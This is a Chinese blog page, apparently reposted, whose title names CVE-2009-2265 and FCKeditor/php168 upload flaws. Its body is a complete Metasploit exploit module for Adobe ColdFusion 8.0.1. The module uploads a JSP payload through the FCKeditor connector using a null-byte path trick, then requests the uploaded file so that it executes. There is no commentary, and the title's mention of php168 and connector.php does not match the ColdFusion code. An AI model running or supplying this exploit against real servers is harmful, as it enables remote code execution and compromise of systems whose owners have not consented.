php168上传漏洞,CVE-2009-2265 FCKeditor connector.php任意文件上传漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安全客，安全资讯平台...

最新推荐文章于 2023-09-20 07:39:33 发布

weixin_40002692

最新推荐文章于 2023-09-20 07:39:33 发布

阅读量348

点赞数

文章标签： php168上传漏洞

##

# $Id: coldfusion_fckeditor.rb 11127 2010-11-24 19:35:38Z jduck $

##

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})

super(update_info(info,

'Name' => 'ColdFusion 8.0.1 Arbitrary File Upload and Execute',

'Description' => %q{

This module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload

and Execute vulnerability.

},

'Author' => [ 'MC' ],

'License' => MSF_LICENSE,

'Version' => '$Revision: 11127 $',

'Platform' => 'win',

'Privileged' => true,

'References' =>

[

[ 'CVE', '2009-2265' ],

[ 'OSVDB', '55684'],

],

'Targets' =>

[

[ 'Universal Windows Target',

{

'Arch' => ARCH_JAVA,

'Payload' =>

{

'DisableNops' => true,

},

}

],

],

'DefaultTarget' => 0,

'DisclosureDate' => 'Jul 3 2009'

))

register_options(

[

Opt::RPORT(80),

OptString.new('FCKEDITOR_DIR', [ false, 'The path to upload.cfm ', '/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm' ]),

], self.class )

end

def exploit

page = rand_text_alpha_upper(rand(10) + 1) + ".jsp"

dbl = Rex::MIME::Message.new

dbl.add_part(payload.encoded, "application/x-java-archive", nil, "form-data; name=\"newfile\"; filename=\"#{rand_text_alpha_upper(8)}.txt\"")

file = dbl.to_s

file.strip!

print_status("Sending our POST request...")

res = send_request_cgi(

{

'uri'=> "#{datastore['FCKEDITOR_DIR']}",

'query'=> "Command=FileUpload&Type=File&CurrentFolder=/#{page}%00",

'version'=> '1.1',

'method'=> 'POST',

'ctype'=> 'multipart/form-data; boundary=' + dbl.bound,

'data'=> file,

}, 5)

if ( res and res.code == 200 and res.body =~ /OnUploadCompleted/ )

print_status("Upload succeeded! Executing payload...")

send_request_raw(

{

# default path in Adobe ColdFusion 8.0.1.

'uri'=> '/userfiles/file/' + page,

'method'=> 'GET',

}, 5)

handler

else

print_error("Upload Failed...")

return

end

end

end

weixin_40002692

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
php168上传漏洞,CVE-2009-2265 FCKeditor connector.php任意文件上传漏洞-漏洞情报、漏洞详情、安全漏洞、CVE - 安全客，安全资讯平台...

### $Id: coldfusion_fckeditor.rb 11127 2010-11-24 19:35:38Z jduck $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the...
复制链接

扫一扫

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。